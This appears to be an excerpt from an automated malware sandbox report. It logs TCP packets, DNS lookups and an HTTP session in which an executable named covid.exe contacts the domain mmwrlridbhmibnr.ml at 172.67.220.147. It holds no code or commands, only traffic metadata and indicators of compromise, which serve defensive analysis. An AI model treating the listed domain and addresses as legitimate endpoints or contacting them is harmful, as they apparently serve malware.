                                                                Apr 20, 2021 22:59:14.583730936 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583745956 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.583755970 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583779097 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583802938 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583803892 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.583827972 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583848953 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.583851099 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583875895 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583893061 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.583901882 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583929062 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583947897 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.583955050 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583992004 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.584403992 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584537029 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584572077 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584583998 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.584599018 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584630966 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584649086 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.584650993 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584675074 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584693909 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.584697008 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584714890 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584731102 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584748030 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584748030 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.584765911 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584783077 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584784985 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.584800959 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584822893 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584824085 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.584842920 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584851027 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.584861040 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584878922 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584884882 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.584896088 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584913015 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584929943 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584939957 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.584983110 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.585344076 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.585369110 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.585410118 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.585432053 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.585433960 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.585453033 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.585457087 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.585480928 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.585504055 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.607996941 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608022928 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608040094 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608057976 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608071089 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608084917 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608098984 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608114004 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608127117 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608139992 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608151913 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608176947 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608179092 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.608195066 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608208895 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.608211994 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608215094 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.608228922 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608246088 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608253956 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.608263969 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608280897 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608285904 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.608298063 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608311892 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.608318090 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608339071 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608346939 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.608355999 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608369112 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608400106 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.608438969 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.608880043 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608903885 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608923912 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608939886 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608949900 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.608958960 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608977079 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608993053 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.608998060 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.609011889 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.609014034 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.609031916 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.609051943 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.609055996 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.609072924 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.609090090 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.609105110 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.609107018 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.609127045 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.609132051 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.609143972 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.609159946 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.609165907 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.609178066 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.609200001 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.609217882 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.609217882 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.609234095 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.609251976 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.609253883 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.609281063 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.609843016 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.609869957 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.609895945 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.609905005 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.609924078 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.609951019 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.609955072 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.609975100 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.609993935 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.609999895 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.610025883 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.610049963 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.610059023 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.610074997 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.610094070 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.610099077 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.610157967 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.660032034 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660068989 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660092115 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660115004 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660137892 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660160065 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.660165071 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660192013 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660213947 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.660217047 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660243034 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660268068 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660268068 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.660294056 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660314083 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.660316944 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660340071 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660360098 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.660366058 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660394907 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660412073 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.660419941 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660442114 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660465002 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660465002 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.660485983 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660507917 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660509109 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.660528898 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660553932 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660557985 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.660578966 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660599947 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.660602093 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660621881 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660644054 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.660645962 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660667896 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660690069 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.660693884 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660718918 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660739899 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.660746098 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660769939 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660789967 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.660798073 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660823107 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660845995 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660855055 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.660868883 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660892963 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660902023 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.660918951 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660943031 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.660947084 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660970926 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.660990953 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.660993099 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661019087 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661036015 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.661042929 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661067009 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661087036 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.661091089 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661117077 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661135912 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.661144018 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661186934 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.661488056 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661518097 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661569118 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661583900 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.661592960 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661621094 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661636114 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.661649942 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661675930 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661700964 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661704063 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.661725044 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661747932 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661751986 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.661772013 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661792040 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.661798954 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661824942 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661845922 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.661849976 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661875963 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661896944 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.661900997 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661926031 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661946058 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.661948919 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661974907 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.661995888 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.662009954 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.662033081 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.662062883 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.865433931 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:57.691538095 CEST4970280192.168.2.7172.67.220.147

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Apr 20, 2021 22:59:03.480581045 CEST6124253192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:03.537749052 CEST53612428.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:03.765964985 CEST5856253192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:03.825591087 CEST53585628.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:03.973659039 CEST5659053192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:04.027196884 CEST53565908.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:04.445034027 CEST6050153192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:04.494206905 CEST53605018.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:05.320496082 CEST5377553192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:05.372695923 CEST53537758.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:06.156315088 CEST5183753192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:06.219965935 CEST53518378.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:06.284997940 CEST5541153192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:06.333602905 CEST53554118.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:07.662137032 CEST6366853192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:07.710809946 CEST53636688.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:08.576298952 CEST5464053192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:08.625125885 CEST53546408.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:09.513241053 CEST5873953192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:09.571078062 CEST53587398.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:11.542737961 CEST6033853192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:11.605129004 CEST53603388.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:11.752775908 CEST5871753192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:11.812586069 CEST53587178.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:13.555123091 CEST5976253192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:13.605463982 CEST53597628.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:14.283757925 CEST5432953192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:14.332566023 CEST53543298.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:15.263148069 CEST5805253192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:15.311777115 CEST53580528.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:16.190433979 CEST5400853192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:16.239104986 CEST53540088.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:17.707003117 CEST5945153192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:17.755932093 CEST53594518.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:18.667550087 CEST5291453192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:18.728842020 CEST53529148.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:19.731760979 CEST6456953192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:19.791662931 CEST53645698.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:20.680387020 CEST5281653192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:20.738553047 CEST53528168.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:21.992486954 CEST5078153192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:22.041332960 CEST53507818.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:22.905011892 CEST5423053192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:22.953547955 CEST53542308.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:23.989623070 CEST5491153192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:24.048361063 CEST53549118.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:24.995657921 CEST4995853192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:25.044671059 CEST53499588.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:27.789151907 CEST5086053192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:27.848284006 CEST53508608.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:27.879282951 CEST5045253192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:27.927898884 CEST53504528.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:29.292191029 CEST5973053192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:29.350326061 CEST53597308.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:49.660680056 CEST5931053192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:49.711036921 CEST53593108.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:58.639651060 CEST5191953192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:58.700697899 CEST53519198.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:00:27.371499062 CEST6429653192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:00:27.435833931 CEST53642968.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:00:32.092233896 CEST5668053192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:00:32.153212070 CEST53566808.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:00:43.199078083 CEST5882053192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:00:43.259835005 CEST53588208.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:00:56.495156050 CEST6098353192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:00:56.548681974 CEST53609838.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:00:57.553138018 CEST4924753192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:00:57.713815928 CEST53492478.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:00:58.205868959 CEST5228653192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:00:58.281033993 CEST53522868.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:00:58.766174078 CEST5606453192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:00:58.830171108 CEST53560648.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:00:59.729046106 CEST6374453192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:00:59.786192894 CEST53637448.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:01:00.913100958 CEST6145753192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:01:01.007164955 CEST53614578.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:01:02.242635012 CEST5836753192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:01:02.302493095 CEST53583678.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:01:03.202275991 CEST6059953192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:01:03.319674969 CEST53605998.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:01:05.239972115 CEST5957153192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:01:05.297350883 CEST53595718.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:01:06.829117060 CEST5268953192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:01:06.892360926 CEST53526898.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:01:07.797477007 CEST5029053192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:01:07.848229885 CEST53502908.8.8.8192.168.2.7

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                Apr 20, 2021 22:59:11.542737961 CEST192.168.2.78.8.8.80xd719Standard query (0)mmwrlridbhmibnr.mlA (IP address)IN (0x0001)

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                Apr 20, 2021 22:59:11.605129004 CEST8.8.8.8192.168.2.70xd719No error (0)mmwrlridbhmibnr.ml172.67.220.147A (IP address)IN (0x0001)
                                                                Apr 20, 2021 22:59:11.605129004 CEST8.8.8.8192.168.2.70xd719No error (0)mmwrlridbhmibnr.ml104.21.86.143A (IP address)IN (0x0001)

                                                                HTTP Request Dependency Graph

                                                                • mmwrlridbhmibnr.ml

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.749702172.67.220.14780C:\Users\user\Desktop\covid.exe
                                                                TimestampkBytes transferredDirectionData
